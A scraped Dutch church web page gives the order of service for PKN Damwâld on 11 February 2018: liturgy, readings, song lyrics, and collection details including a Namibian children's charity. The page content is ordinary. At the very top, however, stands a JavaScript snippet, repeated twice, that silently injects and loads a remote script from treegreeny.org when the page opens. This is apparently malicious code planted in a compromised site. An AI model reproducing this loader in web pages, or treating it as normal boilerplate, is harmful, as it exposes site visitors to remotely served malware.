;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 11 februari 2018 9:30 uur - PKN Damwâld
zondag 11 februari 2018
09:30 uur

Kerkdienst zondag 11 februari 2018 9:30 uur

Informatie

Voorganger:Mw. G. van der Galiën, Damwâld
Organist:Ivo van Hijum
Liturgie
Lied voor de dienst Elb 218
Welkom en mededelingen
We zingen: Psalm 118: 1,5
Stil Gebed, Votum en Groet
Uitleg van Kingkids Paasproject
Refrein:
Stil maar, wacht maar, alles wordt nieuw, de hemel en de aarde.
Stil maar, wacht maar, alles wordt nieuw, de hemel en de aarde.

1. Nu gaan de bloemen nog dood, nu gaat de zon nog onder.
En geen mens kan zonder water en zonder brood.
Refrein

2. Nu ben je soms nog alleen. Nu moet je soms nog huilen.
En als je weg wilt schuilen kun je haast nergens heen.
Refrein

3. Nu heb je nooit genoeg. Nu blijf je steeds iets missen
en in het ongewisse of je ooit krijgt wat je vroeg.
Refrein

4. Daar is geen zon en geen maan. Daar zal God ons verlichten.
Daar zullen alle gezichten vol van zijn heerlijkheid staan.
Refrein

5. Daar is geen dorst of verdriet. Daar zal God ons omgeven.
Daar is gelukkig leven en het eindigt niet.
Refrein

6. Zing voor de eeuwige dag. Zing voor zijn komst en zeg Amen.
Zing voor de Heer die ons samen daar al van eeuwigheid zag.
Refrein
Drempel en Kyrië-gebed
We zingen: Psalm 118: 9
Inleidende woorden
We zingen: gezang 464 : 1,2
Gebed om de Heilige Geest
We lezen: Psalm 119: 89-105
We zingen: Gezang 326: 1
We lezen: Lucas 10: 38-42
We zingen: Gezang 326: 4,5
Preek .
We zingen: Gezang 100: 1,2,4,6, 14 en 15
Gebeden
Collecte
Slotlied Gezang 330
Uitzending en Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: St. Beautiful Kidz Namibia

Beautiful Kidz Namibia is een Christelijke, Interkerkelijke organisatie. In een eigen dagverzorgingscentrum in de sloppenwijk "Katutura"van de hoofdstad Windhoek wordt sinds 2003 steun geboden aan kinderen in nood. In 2014 is de organisatie uitgebreid met het dagopvangcentrum in Ovitoto. Het gaat om steun aan kwetsbare kinderen die veelal het slachtoffer zijn geworden van de HIV/AIDS epidemie. Vader en/of moeder zijn aan de gevolgen van AIDS overleden en in veel gevallen zijn de kinderen zelf ook seropositief. Het met nauwelijks twee miljoen inwoners dun bevolkte land Namibia telt 200.000 weeskinderen! Er is een groot tekort aan opvang voor deze kinderen. Beautiful Kidz gaat de uitdaging aan!

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds